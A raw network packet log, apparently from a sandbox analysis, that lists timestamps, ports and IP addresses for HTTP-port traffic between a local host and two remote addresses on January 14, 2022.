Jan 14, 2022 00:16:07.249360085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249362946 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249413967 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249465942 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249471903 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249526978 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249581099 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249629974 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249633074 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249665022 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249685049 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249686003 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249739885 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249787092 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249789000 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249841928 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249907970 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249941111 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249986887 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250046015 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250046968 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250101089 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250159025 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250160933 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250212908 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250262976 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250266075 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250318050 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250370979 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250418901 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250418901 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250473022 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250490904 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250525951 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250576973 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250627995 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250636101 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250689983 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250741959 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250742912 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250793934 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250797987 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250852108 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250902891 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.250904083 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.250957012 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251005888 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251007080 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251065016 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251116037 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251178026 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251188993 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251231909 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251235008 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251285076 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251338959 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251391888 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251393080 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251444101 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251502991 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251502991 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251544952 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251579046 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251596928 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251650095 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251662970 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251702070 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251756907 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251758099 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251801968 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251857042 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251909971 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251918077 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.251974106 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.251977921 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252032995 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252080917 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252134085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252135038 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252185106 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252234936 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252242088 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252295971 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252296925 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252345085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252397060 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252398014 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252449989 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252500057 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252506971 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252552032 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252603054 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252652884 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252657890 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252717972 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252720118 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252778053 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252836943 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252852917 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252890110 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252940893 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.252948046 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.252993107 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253042936 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253093958 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253098011 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.253149033 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253202915 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.253204107 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253257036 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253271103 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.253310919 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253362894 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253417969 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253422976 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.253477097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253515959 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.253530025 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.253617048 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305207014 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305275917 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305330038 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305382013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305402040 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305434942 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305438042 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305488110 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305541039 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305607080 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305608034 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305663109 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305715084 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305716991 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305767059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305815935 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305820942 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305900097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.305924892 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.305957079 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306006908 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306054115 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306056976 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306111097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306164026 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306174994 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306214094 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306216955 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306269884 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306320906 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306324005 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306380033 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306430101 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306432962 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306485891 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306536913 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306596041 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306596041 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306652069 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306701899 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306703091 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306755066 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306804895 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306807041 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306818008 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306858063 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306905985 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.306911945 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.306973934 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307024956 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307029009 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307075024 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307077885 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307130098 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307179928 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307180882 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307234049 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307284117 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307286024 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307338953 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307389975 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307440042 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307444096 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307497025 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307548046 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307549953 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307596922 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307601929 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307653904 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307703972 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307703972 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307756901 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307807922 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307810068 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307859898 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307909966 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.307961941 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.307962894 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308020115 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308072090 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308074951 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308125019 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308126926 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308180094 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308231115 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308233023 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308281898 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308331966 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308332920 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308383942 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308435917 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308440924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308495998 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308546066 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308598995 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308600903 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308655024 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308705091 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308708906 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308757067 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308758974 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308810949 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308861971 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308864117 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.308912992 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308964014 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.308964968 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309016943 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309067965 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309118986 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309120893 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309175968 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309228897 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309228897 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309283018 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309335947 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309336901 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309385061 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309387922 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309441090 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309492111 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309494019 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309545040 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309597969 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309600115 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309650898 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309709072 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309735060 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309776068 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309824944 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309827089 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.309905052 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309967041 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.309986115 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310020924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310070992 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310110092 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310132027 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310169935 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310206890 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310234070 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310286999 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310336113 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310343027 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310389996 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310441971 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310450077 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310489893 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310494900 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310548067 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310596943 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310597897 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310650110 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310699940 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310702085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310758114 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310806990 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310810089 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310862064 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310909986 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.310913086 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.310966015 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311013937 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.311014891 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311068058 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311119080 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311120033 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.311170101 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311227083 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311269045 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311274052 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.311316013 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.311330080 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.311348915 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.311378002 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.340775967 CET	49900	80	192.168.2.4	185.163.45.70
Jan 14, 2022 00:16:07.365096092 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365125895 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365149021 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365173101 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365194082 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365216017 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365215063 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365240097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365259886 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365263939 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365266085 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365272045 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365286112 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365302086 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365308046 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365319014 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365330935 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365338087 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365354061 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365365028 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365376949 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365382910 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365398884 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365422010 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365434885 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365442038 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365442991 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365448952 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365463972 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365463972 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365485907 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365489006 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365508080 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365513086 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365530014 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365534067 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365550995 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365572929 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365575075 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365582943 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365592957 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365595102 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365613937 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365626097 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365636110 CET	80	49899	93.189.42.167	192.168.2.4
